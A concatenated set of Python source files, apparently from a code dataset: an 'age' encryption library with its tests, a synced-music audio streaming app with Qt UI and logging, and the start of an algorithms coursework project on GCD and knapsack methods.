"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacb589584a3b51348f292714ab0d51537e404d9882f9b03aa3d7fedfd"
)
)
@contextmanager
def should_exit(code=1):
with raises(SystemExit) as wrapped_e:
yield
assert wrapped_e.type == SystemExit
assert wrapped_e.value.code == code
def fake_random(n):
# really bad random data (n times 0xaa byte)
return b"\xaa" * n
def test_generate(capsys):
gen_func = "cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate"
with mock.patch(gen_func) as mock_generate, mock.patch("age.cli.datetime") as mock_datetime:
mock_datetime.now.return_value = datetime.datetime(2019, 11, 10, 10, 00, 00)
mock_datetime.side_effect = lambda *args, **kw: datetime.datetime(*args, **kw)
mock_generate.return_value = X25519PrivateKey.from_private_bytes(TEST_KEY_RAW)
generate()
captured = capsys.readouterr()
assert captured.out == TEST_KEY
def test_encrypt(capsysbinary, monkeypatch):
with mock.patch("os.urandom", fake_random):
encrypt(recipients=[TEST_KEY_PUBLIC], infile=io.BytesIO(TEST_PLAINTEXT))
captured = capsysbinary.readouterr()
assert captured.out == TEST_CIPHERTEXT
def test_encrypt_no_recipient(capsys):
with should_exit(1):
encrypt(infile=io.BytesIO(TEST_PLAINTEXT))
captured = capsys.readouterr()
assert captured.err != ""
def test_encrypt_to_tty():
with mock.patch("sys.stdout", return_value=False):
assert sys.stdout.isatty()
with should_exit(1):
encrypt([TEST_KEY_PUBLIC], infile=TEST_PLAINTEXT)
def test_decrypt(fs, capsysbinary):
keys_filename = os.path.expanduser("~/.config/age/keys.txt")
fs.create_file(keys_filename, contents=TEST_KEY)
decrypt(infile=io.BytesIO(TEST_CIPHERTEXT))
captured = capsysbinary.readouterr()
assert captured.out == TEST_PLAINTEXT
def test_decrypt_from_file(fs, capsysbinary):
keys_filename = os.path.expanduser("~/.config/age/keys.txt")
fs.create_file(keys_filename, contents=TEST_KEY)
ciphertext_filename = "/tmp/test.age"
fs.create_file(ciphertext_filename, contents=TEST_CIPHERTEXT)
with open(ciphertext_filename, "rb") as infile:
decrypt(infile=infile)
captured = capsysbinary.readouterr()
assert captured.out == TEST_PLAINTEXT
def test_decrypt_to_file(fs):
keys_filename = os.path.expanduser("~/.config/age/keys.txt")
fs.create_file(keys_filename, contents=TEST_KEY)
ciphertext_filename = "/tmp/test.age"
fs.create_file(ciphertext_filename, contents=TEST_CIPHERTEXT)
plaintext_filename = "/tmp/test.txt"
with open(plaintext_filename, "wb") as outfile, open(ciphertext_filename, "rb") as infile:
decrypt(outfile=outfile, infile=infile)
with open(plaintext_filename, "rb") as plaintext_file:
assert plaintext_file.read() == TEST_PLAINTEXT
```
#### File: src/age/file.py
```python
import io
import sys
import typing
from age.exceptions import UnknownRecipient
from age.format import Header, Recipient, dump_header, load_header
from age.keys.base import DecryptionKey, EncryptionKey
from age.primitives.hkdf import hkdf
from age.primitives.hmac import HMAC
from age.primitives.random import random
from age.recipients.helpers import decrypt_file_key, generate_recipient_from_key, get_recipient
from age.stream import stream_decrypt, stream_encrypt
__all__ = ["Encryptor", "Decryptor"]
HEADER_HKDF_LABEL = b"header"
PAYLOAD_HKDF_LABEL = b"payload"
class Encryptor(io.RawIOBase):
def __init__(self, keys: typing.Collection[EncryptionKey], stream: typing.BinaryIO):
self._stream: typing.BinaryIO = stream
self._file_key: bytes = random(16)
self._plaintext_buffer: bytes = b""
self._write_header(keys)
def writable(self):
return True
def write(self, data):
self._plaintext_buffer += data
return len(data)
def close(self):
if not self.closed:
self._encrypt_buffer()
super().close()
def _hkdf(self, label: bytes, salt: bytes = b"") -> bytes:
return hkdf(salt, label, self._file_key, 32)
def _write_header(self, keys):
header = Header()
for key in keys:
recipient = generate_recipient_from_key(key, self._file_key)
recipient_args, recipient_body = recipient.dump()
header.recipients.append(Recipient(recipient.TAG, recipient_args, recipient_body))
header_stream = io.BytesIO()
dump_header(header, header_stream, mac=None)
mac = HMAC(self._hkdf(HEADER_HKDF_LABEL)).generate(header_stream.getvalue())
dump_header(header, self._stream, mac=mac)
def _encrypt_buffer(self):
self._stream.write(b"\n")
nonce = random(16)
self._stream.write(nonce)
stream_key = self._hkdf(PAYLOAD_HKDF_LABEL, nonce)
ciphertext = stream_encrypt(stream_key, self._plaintext_buffer)
self._stream.write(ciphertext)
self._plaintext_buffer = b""
class Decryptor(io.RawIOBase):
def __init__(self, identities: typing.Collection[DecryptionKey], stream: typing.BinaryIO):
self._stream: typing.BinaryIO = stream
self._file_key: typing.Optional[bytes] = None
self._plaintext_stream: typing.Optional[typing.BinaryIO] = None
self._decrypt_header(identities)
self._decrypt_body()
def readable(self):
return True
def read(self, size=-1):
assert self._plaintext_stream is not None
return self._plaintext_stream.read(size)
def _hkdf(self, label: bytes, salt: bytes = b"") -> bytes:
assert self._file_key is not None
return hkdf(salt, label, self._file_key, 32)
def _decrypt_header(self, identities: typing.Collection[DecryptionKey]):
header, mac = load_header(self._stream)
recipients = []
for header_recipient in header.recipients:
try:
recipient = get_recipient(
header_recipient.type, header_recipient.arguments, header_recipient.body
)
except UnknownRecipient:
print(f"Ignoring unknown recipient type '{header_recipient.type}'", file=sys.stderr)
else:
recipients.append(recipient)
self._file_key = decrypt_file_key(recipients, identities)
header_stream = io.BytesIO()
dump_header(header, header_stream, mac=None)
HMAC(self._hkdf(HEADER_HKDF_LABEL)).verify(header_stream.getvalue(), mac)
# TODO: Should we try another identity if HMAC validation fails?
def _decrypt_body(self):
assert self._file_key is not None
nonce = self._stream.read(16)
assert len(nonce) == 16, "Could not read nonce"
stream_key = self._hkdf(PAYLOAD_HKDF_LABEL, nonce)
ciphertext = self._stream.read()
plaintext = stream_decrypt(stream_key, ciphertext)
self._plaintext_stream = io.BytesIO(plaintext)
self._plaintext_stream.seek(0)
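# Hedged usage sketch (illustrative only; AgePrivateKey lives in age.keys.agekey
# elsewhere in this repository and is assumed to be importable here):
#
#   key = AgePrivateKey.generate()
#   buf = io.BytesIO()
#   with Encryptor([key.public_key()], buf) as encryptor:
#       encryptor.write(b"hello world")
#   buf.seek(0)
#   assert Decryptor([key], buf).read() == b"hello world"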
```
#### File: age/primitives/encode_test.py
```python
import os
from pytest import raises
from .encode import decode, encode
def test_encode_types():
data = encode(b"Hello World!")
assert isinstance(data, str)
with raises(TypeError):
encode("Hello String :(")
def test_decode_types():
data = decode("SGVsbG8gV29ybGQh")
assert isinstance(data, bytes)
with raises(TypeError):
decode(b"Hello Bytes :(")
def test_encode():
encoded = encode(b"Hello World!")
assert encoded == "SGVsbG8gV29ybGQh"
def test_encode_decode():
data = os.urandom(256)
encoded = encode(data)
decoded = decode(encoded)
assert decoded == data
def test_decode_garbage():
assert decode("SGVsbG8gV29ybGQ!") == decode("SGVsbG8gV29ybGQ")
```
#### File: age/primitives/hkdf.py
```python
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
__all__ = ["hkdf"]
def hkdf(salt: bytes, label: bytes, key: bytes, len: int) -> bytes:
"""Derive a key of len `len` using HKDF (:rfc:`5869`) using HMAC SHA-256
:param salt: Salt
:param label: Label
:param key: Key
:param len: Length of key to generate
:returns: Key of length `len`
>>> key = hkdf(b'', b'label', b'secret', 16)
>>> len(key)
16
>>> key.hex()
'112fefb269ce7dcb2ea6c7e952c104c1'
"""
return HKDF(
algorithm=hashes.SHA256(), length=len, salt=salt, info=label, backend=default_backend()
).derive(key)
```
#### File: age/primitives/scrypt.py
```python
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
__all__ = ["scrypt"]
def scrypt(salt: bytes, N: int, password: bytes) -> bytes:
"""Derive a key from `password` and `salt`
For the choise of `N`, see `<https://blog.filippo.io/the-scrypt-parameters/>`_.
:param salt: Salt
:param N: Scrypt cost
:param password: Password
"""
kdf = Scrypt(salt=salt, length=32, n=N, r=8, p=1, backend=default_backend())
return kdf.derive(password)
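# Illustrative note: the wrapper fixes the derived key length at 32 bytes, e.g.
#   len(scrypt(b"salt", 2 ** 14, b"password")) == 32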
```
#### File: age/recipients/scrypt.py
```python
import typing
from age.algorithms.scrypt import scrypt_decrypt_file_key, scrypt_encrypt_file_key
from age.keys.base import DecryptionKey, EncryptionKey
from age.keys.password import PasswordKey
from age.primitives.encode import decode, encode
from age.recipients.base import Recipient
class SCryptRecipient(Recipient):
TAG: str = "scrypt"
ENCRYPTION_KEY_TYPE: typing.Type[EncryptionKey] = PasswordKey
DECRYPTION_KEY_TYPE: typing.Type[DecryptionKey] = PasswordKey
def __init__(self, salt: bytes, log_cost: int, encrypted_file_key: bytes):
self.salt: bytes = salt
self.log_cost: int = log_cost
self.encrypted_file_key: bytes = encrypted_file_key
@classmethod
def generate(cls, password_key: EncryptionKey, file_key: bytes):
assert isinstance(password_key, PasswordKey)
salt, cost, encrypted_file_key = scrypt_encrypt_file_key(password_key, file_key)
return cls(salt, cost, encrypted_file_key)
@classmethod
def load(cls, args: typing.List[str], body: str):
return cls(decode(args[0]), int(args[1]), decode(body))
def dump(self) -> typing.Tuple[typing.List[str], str]:
return [encode(self.salt), str(self.log_cost)], encode(self.encrypted_file_key)
def decrypt(self, password_key: DecryptionKey) -> bytes:
assert isinstance(password_key, PasswordKey)
return scrypt_decrypt_file_key(
password_key, self.salt, self.log_cost, self.encrypted_file_key
)
```
#### File: age/recipients/ssh_rsa.py
```python
import typing
from age.algorithms.ssh_rsa import ssh_rsa_decrypt_file_key, ssh_rsa_encrypt_file_key
from age.keys.base import DecryptionKey, EncryptionKey
from age.keys.rsa import RSAPrivateKey, RSAPublicKey
from age.primitives.encode import decode, encode
from age.recipients.base import Recipient
class SSHRSARecipient(Recipient):
TAG: str = "ssh-rsa"
ENCRYPTION_KEY_TYPE: typing.Type[EncryptionKey] = RSAPublicKey
DECRYPTION_KEY_TYPE: typing.Type[DecryptionKey] = RSAPrivateKey
def __init__(self, fingerprint: bytes, encrypted_file_key: bytes):
self.fingerprint: bytes = fingerprint
self.encrypted_file_key: bytes = encrypted_file_key
@classmethod
def generate(cls, password_key: EncryptionKey, file_key: bytes):
assert isinstance(password_key, RSAPublicKey)
fingerprint, encrypted_file_key = ssh_rsa_encrypt_file_key(password_key, file_key)
return cls(fingerprint, encrypted_file_key)
@classmethod
def load(cls, args: typing.List[str], body: str):
return cls(decode(args[0]), decode(body))
def dump(self) -> typing.Tuple[typing.List[str], str]:
return [encode(self.fingerprint)], encode(self.encrypted_file_key)
def decrypt(self, password_key: DecryptionKey) -> bytes:
assert isinstance(password_key, RSAPrivateKey)
return ssh_rsa_decrypt_file_key(password_key, self.fingerprint, self.encrypted_file_key)
```
#### File: src/age/stream.py
```python
import math
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305
PLAINTEXT_BLOCK_SIZE = 64 * 1024
CIPHERTEXT_BLOCK_SIZE = PLAINTEXT_BLOCK_SIZE + 16
NONCE_COUNTER_MAX = 2 ** (8 * 11) - 1
def _pack_nonce(nonce: int, last_block: bool = False) -> bytes:
assert nonce <= NONCE_COUNTER_MAX, "Stream nonce wrapped around"
return nonce.to_bytes(11, byteorder="big", signed=False) + (b"\x01" if last_block else b"\x00")
def _chunk(data, size):
for i in range(0, len(data), size):
yield data[i : i + size]
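# Illustrative example: list(_chunk(b"abcdef", 4)) == [b"abcd", b"ef"]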
def stream_encrypt(key: bytes, data: bytes) -> bytes:
assert len(key) == 32
aead = ChaCha20Poly1305(key)
blocks = math.ceil(len(data) / PLAINTEXT_BLOCK_SIZE)
encrypted = b""
for nonce, block in enumerate(_chunk(data, PLAINTEXT_BLOCK_SIZE)):
last_block = nonce == blocks - 1
packed_nonce = _pack_nonce(nonce, last_block=last_block)
encrypted += aead.encrypt(nonce=packed_nonce, data=block, associated_data=None)
return encrypted
def stream_decrypt(key: bytes, data: bytes) -> bytes:
assert len(key) == 32
aead = ChaCha20Poly1305(key)
blocks = math.ceil(len(data) / CIPHERTEXT_BLOCK_SIZE)
decrypted = b""
for nonce, block in enumerate(_chunk(data, CIPHERTEXT_BLOCK_SIZE)):
last_block = nonce == blocks - 1
packed_nonce = _pack_nonce(nonce, last_block=last_block)
decrypted += aead.decrypt(nonce=packed_nonce, data=block, associated_data=None)
return decrypted
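# Hedged round-trip sketch (illustrative only, not part of the original module):
# each 64 KiB plaintext chunk becomes a 64 KiB + 16 byte ciphertext chunk, and
# decryption reverses encryption exactly:
#
#   import os
#   key = os.urandom(32)
#   data = os.urandom(3 * PLAINTEXT_BLOCK_SIZE + 123)  # spans several chunks
#   assert stream_decrypt(key, stream_encrypt(key, data)) == data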
```
#### File: age/utils/copy_doc.py
```python
def copy_doc(original_function):
"""Decorator to copy docstring from `original_function` to decorated function"""
def wrapper(func):
func.__doc__ = original_function.__doc__
return func
return wrapper
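# Illustrative example (not part of the original module):
#
#   def original():
#       """Original docstring."""
#
#   @copy_doc(original)
#   def duplicate():
#       pass
#
#   assert duplicate.__doc__ == "Original docstring."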
``` |
{
"source": "jojonas/synced-music",
"score": 3
} |
#### File: core/client/audio.py
```python
import threading
import wave
import Queue
import pyaudio
from ..util import audio as audio
from ..util import threads
class WaveFileWriter(object):
def __init__(self, logger, timer):
self.waveFile = wave.open("outwave.wav", "w")
self.waveFile.setnchannels(audio.CHANNELS)
self.waveFile.setsampwidth(audio.pyaudio.get_sample_size(audio.SAMPLE_FORMAT))
self.waveFile.setframerate(audio.SAMPLE_RATE)
def stop(self):
self.waveFile.close()
def start(self):
pass
def getEnqueued(self):
return 0
def enqueueSound(self, playAt, buffer):
self.waveFile.writeframes(buffer)
pass
class SoundDeviceWriter(threads.QStoppableThread):
def __init__(self, logger, timer):
threads.QStoppableThread.__init__(self, name="Client Audio")
self.paHandler = pyaudio.PyAudio()
self.stream = self.paHandler.open(format = audio.SAMPLE_FORMAT, channels = audio.CHANNELS, rate = audio.SAMPLE_RATE, output=True)
self.soundBufferQueue = Queue.Queue(-1) # infinite size
self.logger = logger
self.timer = timer
def run(self):
while not self.done():
try:
playAt, soundBuffer = self.soundBufferQueue.get(block=True, timeout=5.0)
deltaTime = playAt - self.timer.time()
if deltaTime > 0:
if deltaTime > 10.0:
continue
else:
self.logger.debug("Waiting for %f seconds.", deltaTime)
# Sleep, but don't "oversleep" a quit event. waitStop() sleeps at most deltaTime seconds and returns whether the thread will quit afterwards
sleepUntil = self.timer.time() + deltaTime
waitStopTime = deltaTime - 0.05
if waitStopTime > 0:
if self.waitStop(waitStopTime):
break
while self.timer.time() < sleepUntil:
pass
else: # deltaTime <= 0
# chop off samples that should have been played in the past
cropBytes = audio.secondsToBytes(-deltaTime)
self.logger.debug("Cropping %f seconds = %d bytes.", -deltaTime, cropBytes)
soundBuffer = soundBuffer[cropBytes:]
if self.stream != None:
self.stream.write(soundBuffer, exception_on_underflow=False)
except IOError as e:
self.logger.error("Sound could not be played. Exception error following.")
self.logger.exception(e)
except Queue.Empty:
self.logger.warning("Sound buffer queue empty.")
pass
except Exception as e:
self.logger.exception(e)
def __del__(self):
self.stream.stop_stream()
self.stream.close()
self.paHandler.terminate()
self.stream = None
def enqueueSound(self, playAt, buffer):
self.soundBufferQueue.put((playAt, buffer))
def getEnqueued(self):
return self.soundBufferQueue.qsize()
```
#### File: core/client/ui.py
```python
from PyQt4 import QtCore, QtGui
from ..util import log, metrix, ui
class Widget(ui.Widget):
def setup(self):
frmServerSelection = QtGui.QGroupBox("Server Selection", self)
layoutServerSelection = QtGui.QHBoxLayout(frmServerSelection)
lblServer = QtGui.QLabel("&Server / Host name:", frmServerSelection)
self.txtServer = QtGui.QLineEdit(frmServerSelection)
lblServer.setBuddy(self.txtServer)
self.btnConnect = QtGui.QPushButton("&Connect")
self.txtServer.returnPressed.connect(self.btnConnect.click)
layoutServerSelection.addWidget(lblServer)
layoutServerSelection.addWidget(self.txtServer)
layoutServerSelection.addWidget(self.btnConnect)
self.addLeftSide(frmServerSelection)
frmControls = QtGui.QGroupBox("Controls", self)
layoutControls = QtGui.QHBoxLayout(frmControls)
self.btnResync = QtGui.QPushButton("&Resync", frmControls)
layoutControls.addWidget(self.btnResync)
self.addLeftSide(frmControls)
frmSettings = QtGui.QGroupBox("Settings", self)
layoutSettings = QtGui.QVBoxLayout(frmSettings)
self.swOffset = ui.SecondsWidget(self, "&Offset:", range=(-60.0, +60.0), step=0.010)
layoutSettings.addWidget(self.swOffset)
self.lsTimerRingSize = ui.LabeledSpinner(self, "Timer ring size:", QtGui.QSpinBox)
self.lsTimerRingSize.setRange(0, 100000)
self.lsTimerRingSize.setValue(200)
self.lsTimerRingSize.setSingleStep(10)
layoutSettings.addWidget(self.lsTimerRingSize)
self.addLeftSide(frmSettings)
self.setWindowTitle("Client - SyncedMusic")
self.txtServer.setFocus()
```
#### File: core/server/ui.py
```python
import sys
from PyQt4 import QtCore, QtGui
from ..util import log, metrix, ui
import pyaudio
class Widget(ui.Widget):
def setup(self):
frmControls = QtGui.QGroupBox("Controls", self)
layoutControls = QtGui.QHBoxLayout(frmControls)
self.btnResync = QtGui.QPushButton("&Resync", frmControls)
lblDevice = QtGui.QLabel("&Sound device:", frmControls)
lblDevice.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.cmbDevice = QtGui.QComboBox(frmControls)
lblDevice.setBuddy(self.cmbDevice)
layoutControls.addWidget(self.btnResync)
layoutControls.addWidget(lblDevice)
layoutControls.addWidget(self.cmbDevice)
self.addLeftSide(frmControls)
paHandler = pyaudio.PyAudio()
for i in xrange(paHandler.get_device_count()):
deviceInfo = paHandler.get_device_info_by_index(i)
self.logger.info("Devices: %s", str(deviceInfo))
self.cmbDevice.addItem(deviceInfo["name"])
self.cmbDevice.setCurrentIndex(paHandler.get_default_input_device_info()["index"])
paHandler.terminate()
frmSettings = QtGui.QGroupBox("Settings", self)
layoutSettings = QtGui.QVBoxLayout(frmSettings)
self.swTimestampInterval = ui.SecondsWidget(self, "&Time stamp interval:", range=(0.0,60.0), step=0.1)
layoutSettings.addWidget(self.swTimestampInterval)
self.swChunkInterval = ui.SecondsWidget(self, "&Chunk interval:", range=(0.0,3600.0), step=0.1)
layoutSettings.addWidget(self.swChunkInterval)
self.swPlayChunkDelay = ui.SecondsWidget(self, "&Play chunk delay:", range=(0.0,3600.0), step=0.1)
layoutSettings.addWidget(self.swPlayChunkDelay)
self.lsTimerRingSize = ui.LabeledSpinner(self, "Timer ring size:", QtGui.QSpinBox)
self.lsTimerRingSize.setRange(0, 100000)
self.lsTimerRingSize.setValue(200)
self.lsTimerRingSize.setSingleStep(10)
layoutSettings.addWidget(self.lsTimerRingSize)
self.swTimestampInterval.setValue(0.4)
self.swChunkInterval.setValue(1.0)
self.swPlayChunkDelay.setValue(2.0)
self.addLeftSide(frmSettings)
self.setWindowTitle("Server - SyncedMusic")
```
#### File: core/util/audio.py
```python
import pyaudio
# Mostly synced-music is written to be rather robust in the sense that server and client don't have to
# have many variables that should be set according to each other. Most of the configurable values are
# rather free to set on both sides with the other side mostly adapting to it. Including the port in network.py
# this is also an exception.
# Sound constants
SAMPLE_FORMAT = pyaudio.paInt16
SAMPLE_RATE = 44100
CHANNELS = 2
def bytesToSeconds(bytes):
return float(bytes)/CHANNELS/SAMPLE_RATE/pyaudio.get_sample_size(SAMPLE_FORMAT)
def secondsToBytes(seconds):
# must be a multiple of CHANNELS*sample_size (for dropping/cropping. don't mess up the words)
sample_size = pyaudio.get_sample_size(SAMPLE_FORMAT)
exact_bytes = int(seconds*CHANNELS*SAMPLE_RATE*sample_size)
return exact_bytes - exact_bytes % (CHANNELS*sample_size)
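# Worked example: with 16-bit samples (2 bytes), 2 channels and 44100 Hz, one
# second of audio is 44100 * 2 * 2 = 176400 bytes, so secondsToBytes(1.0) == 176400
# and bytesToSeconds(176400) == 1.0.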
```
#### File: core/util/log.py
```python
from PyQt4 import QtGui, QtCore
import sys
import logging
import logging.handlers
# http://stackoverflow.com/questions/12214801/python-print-a-string-as-hex-bytes
def hex(s):
return ":".join("{0:02x}".format(ord(c)) for c in s)
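# Illustrative example: hex("AB") returns "41:42" (this helper expects a Python 2
# byte string, matching the rest of this module).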
# --
LOG_FORMAT = "%(asctime)s.%(msecs)d %(filename)s:%(lineno)d %(levelname)s :: %(message)s"
DATE_FORMAT = "%d.%m.%Y %H:%M:%S"
LEVELS = {"error": logging.ERROR, "warning": logging.WARN, "info": logging.INFO, "debug": logging.DEBUG}
class TextLog(QtGui.QTreeWidget, logging.Handler):
signalHandle = QtCore.pyqtSignal(logging.LogRecord)
def __init__(self, parent=None):
QtGui.QTreeWidget.__init__(self, parent)
logging.Handler.__init__(self)
headerItem = QtGui.QTreeWidgetItem()
headerItem.setData(0,0, QtCore.QString("Level"))
headerItem.setData(1,0, QtCore.QString("Time"))
headerItem.setData(2,0, QtCore.QString("Location"))
headerItem.setData(3,0, QtCore.QString("PID:TID"))
headerItem.setData(4,0, QtCore.QString("Message"))
self.setHeaderItem(headerItem)
self.setRootIsDecorated(False)
self.setSelectionMode(QtGui.QAbstractItemView.NoSelection)
self.logger = logging.getLogger(__name__)
self.logger.addHandler(self)
self.max_entries = 1000
self.colors = {
logging.DEBUG: QtGui.QColor(200,255,200),
logging.INFO: QtGui.QColor(200,220,255),
logging.WARNING: QtGui.QColor(255,255,200),
logging.ERROR: QtGui.QColor(255,200,200),
logging.CRITICAL: QtGui.QColor(255,100,100)
}
self.filter = None
shortcutCtrlF = QtGui.QShortcut(QtGui.QKeySequence("Ctrl+F"), self)
shortcutCtrlF.activated.connect(self.filterDialog)
shortcutCtrlL = QtGui.QShortcut(QtGui.QKeySequence("Ctrl+L"), self)
shortcutCtrlL.activated.connect(self.levelDialog)
self.signalHandle.connect(self.handleRecord)
def handle(self, record):
self.signalHandle.emit(record)
@QtCore.pyqtSlot(logging.LogRecord)
def handleRecord(self, record):
item = QtGui.QTreeWidgetItem()
item.setData(0,0, QtCore.QString(record.levelname))
item.setData(1,0, QtCore.QString("%s.%d" % (record.asctime, record.msecs)))
item.setData(2,0, QtCore.QString("%s:%d (%s)" % (record.filename, record.lineno, record.pathname)))
item.setData(3,0, QtCore.QString("%d:%d" % (record.process, record.thread)))
item.setData(4,0, QtCore.QString(record.message))
shown = self.filterMatch(item)
for i in xrange(self.columnCount()):
item.setData(i,8, self.colors[record.levelno])
self.addTopLevelItem(item)
if shown:
self.scrollToItem(item)
else:
item.setHidden(True)
while self.topLevelItemCount() > self.max_entries:
self.takeTopLevelItem(0)
@QtCore.pyqtSlot()
def levelDialog(self):
level, ok = QtGui.QInputDialog.getItem(self, "Logging Level", "Choose logging level (for future logs):", [QtCore.QString(level).toUpper() for level in LEVELS.keys()], editable=False)
if ok:
logging.getLogger(__name__).setLevel(LEVELS[str(level.toLower())])
@QtCore.pyqtSlot()
def filterDialog(self):
text, ok = QtGui.QInputDialog.getText(self, "Filter", "Enter part of string to filter (leave empty to disable filtering):", text=(self.filter if self.filter is not None else ""))
if ok:
if len(text) == 0:
self.filter = None
else:
self.filter = str(text)
self.filterAll()
def filterAll(self):
for i in xrange(self.topLevelItemCount()):
item = self.topLevelItem(i)
item.setHidden(not self.filterMatch(item))
def filterMatch(self, item):
if self.filter is None:
return True
else:
searchStr = self.filter.lower().strip()
for columnNo in xrange(self.columnCount()):
data = str(item.data(columnNo,0).toString().toLower())
if searchStr in data:
return True
return False
def __del__(self):
self.logger.removeHandler(self)
QtGui.QTreeWidget.__del__(self)
def setup_logger(logger, lvl, stdout=True):
logger.setLevel(LEVELS[lvl.lower()])
if stdout:
stdoutHandler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(LOG_FORMAT, DATE_FORMAT)
stdoutHandler.setFormatter(formatter)
logger.addHandler(stdoutHandler)
def getLogger():
return logging.getLogger(__name__)
```
#### File: core/util/metrix.py
```python
from PyQt4 import QtGui, QtCore
from collections import OrderedDict
import logging
class Metrix(QtGui.QTreeWidget):
def __init__(self, parent=None, updateInterval=300):
QtGui.QTreeWidget.__init__(self, parent)
self.variables = OrderedDict()
self.treeitems = {}
headerItem = QtGui.QTreeWidgetItem()
headerItem.setData(0,0, "Name")
headerItem.setData(1,0, "Value")
self.setHeaderItem(headerItem)
self.setRootIsDecorated(False)
self.setWordWrap(True)
self.timer = QtCore.QTimer(self)
self.timer.setInterval(updateInterval)
#self.timer.timerEvent = self.update
self.timer.timeout.connect(self.update)
self.timer.start()
def add(self, name, callback):
self.variables[name] = callback
self.treeitems[name] = QtGui.QTreeWidgetItem()
self.treeitems[name].setData(0, 0, QtCore.QString(name))
self.treeitems[name].setData(1, 0, QtCore.QString(repr(callback())))
self.addTopLevelItem(self.treeitems[name])
self.resizeColumnToContents(0)
self.resizeColumnToContents(1)
def remove(self, name):
        del self.variables[name]
        self.takeTopLevelItem(self.indexOfTopLevelItem(self.treeitems[name]))
        del self.treeitems[name]
@QtCore.pyqtSlot()
def update(self, dummy=None):
for name, callback in self.variables.iteritems():
self.treeitems[name].setData(1, 0, repr(callback()))
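# Hedged usage sketch (names are illustrative, not from the original repository):
# registered callbacks are polled every `updateInterval` milliseconds and shown
# via repr(), e.g.
#   metrix = Metrix(parentWidget)
#   metrix.add("Enqueued sound buffers", audioWriter.getEnqueued)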
def getLogger():
return logging.getLogger(__name__)
``` |
{
"source": "jojonium/CS-2223-Algorithms",
"score": 4
} |
#### File: CS-2223-Algorithms/Project 1/Project1.py
```python
import time
def euclid(m, n):
# Input: Two positive integers m and n
# Output: Greatest common divisor of m and n
while n != 0:
r = m % n
m = n
n = r
return m
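# Worked example: euclid(60, 24) computes 60 % 24 = 12, then 24 % 12 = 0, so it
# returns 12.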
def integer_check(m, n):
# Input: Two positive integers m and n
# Output: Greatest common divisor of m and n
if m < n:
t = m
else:
t = n
while t >= 0:
if m % t == 0:
if n % t == 0:
return t
t -= 1
def prime_factors(n):
# Input: A positive integer
# Output: All the prime factors of the input
factors = []
d = 2
while d * d <= n:
while n % d == 0:
factors.append(d)
n //= d
d = d + 1
if n > 1:
factors.append(n)
return factors
def middle_school(m, n):
# Input: Two positive integers m and n
# Output: Greatest common divisor of m and n
m_factors = prime_factors(m)
n_factors = prime_factors(n)
common_factors = []
for x in m_factors:
for y in n_factors:
if x == y:
n_factors.remove(y)
common_factors.append(y)
break
out = 1
for z in common_factors:
out = out * z
return out
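# Worked example: 120 = 2*2*2*3*5 and 180 = 2*2*3*3*5 share the prime factors
# 2, 2, 3 and 5, so middle_school(120, 180) returns 2*2*3*5 = 60.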
def eff_gcd(s1, s2):
t0 = time.perf_counter()
gcd = euclid(s1, s2)
t1 = time.perf_counter()
elapsed = t1 - t0
print("\nEuclid Algorithm:\nAnswer: " + str(gcd) + "\nTime elapsed: " + str(elapsed))
t0 = time.perf_counter()
gcd = integer_check(s1, s2)
t1 = time.perf_counter()
elapsed = t1 - t0
print("\nConsecutive Integer Check Algorithm:\nAnswer: " + str(gcd) + "\nTime elapsed: " + str(elapsed))
t0 = time.perf_counter()
gcd = middle_school(s1, s2)
t1 = time.perf_counter()
elapsed = t1 - t0
print("\nMiddle School Method:\nAnswer: " + str(gcd) + "\nTime elapsed: " + str(elapsed))
def main():
error_count = 0
while error_count < 3:
i = input("Input a positive integer: ")
j = input("Input a positive integer: ")
try:
s1 = int(i)
s2 = int(j)
if s1 <= 0 or s2 <= 0:
raise ValueError
eff_gcd(s1, s2)
return 1
except ValueError:
print("Invalid input, try again!\n")
error_count += 1
print("Too many invalid inputs. Goodbye.")
return 0
main()
'''
# Tests
print("Euclid algorithm: 60, 24: " + str(euclid(60, 24)))
print("Euclid algorithm: 20, 25: " + str(euclid(20, 25)))
print("Euclid algorithm: 120, 180: " + str(euclid(120, 180)))
print("Euclid algorithm: 49204, 329012: " + str(euclid(49204, 329012)))
print("Euclid algorithm: 49204, 329012: " + str(euclid(181427400, 25989600)))
print("Euclid algorithm: 129749, 429801: " + str(euclid(129749, 429801)) + "\n")
print("Consecutive Integer Check algorithm: 60, 24: " + str(integer_check(60, 24)))
print("Consecutive Integer Check algorithm: 20, 25: " + str(integer_check(20, 25)))
print("Consecutive Integer Check algorithm: 120, 180: " + str(integer_check(120, 180)))
print("Consecutive Integer Check algorithm: 49204, 329012: " + str(integer_check(49204, 329012)))
print("Consecutive Integer Check algorithm: 181427400, 25989600: " + str(integer_check(181427400, 25989600)))
print("Consecutive Integer Check algorithm: 129749, 429801: " + str(integer_check(129749, 429801)) + "\n")
print("Middle School algorithm: 60, 24: " + str(middle_school(60, 24)))
print("Middle School algorithm: 20, 25: " + str(middle_school(20, 25)))
print("Middle School algorithm: 120, 180: " + str(middle_school(120, 180)))
print("Middle School algorithm: 49204, 329012: " + str(middle_school(49204, 329012)))
print("Middle School algorithm: 181427400, 25989600: " + str(middle_school(181427400, 25989600)))
print("Middle School algorithm: 129749, 429801: " + str(middle_school(129749, 429801)) + "\n")
'''
```
#### File: CS-2223-Algorithms/Project 3/project_3.py
```python
import sys
from getopt import getopt, GetoptError
from itertools import chain, combinations
from time import perf_counter
# Input: list l
# Output: a list that represents a set of all subsets of list l
def power_set(l):
return chain.from_iterable(combinations(l, r) for r in range(len(l) + 1))
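# Illustrative example: list(power_set([1, 2])) == [(), (1,), (2,), (1, 2)]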
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items, and an int 'cap', representing the maximum capacity of the knapsack
# Output: The total value of all items in 'items', if their total weight is less
# than the capacity of the knapsack, or zero if they are too heavy
def conditional_value(items, max_weight):
return sum([x[1] for x in items]) if sum([x[0] for x in items]) <= max_weight else 0
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items; and an int, 'cap', representing the maximum capacity of the knapsack.
# Output: The optimal way to select items, maximizing the total value while keeping
# the total weight below cap, found by exhaustively comparing every possibility.
# The first variable returned is the optimal value, the second variable returned
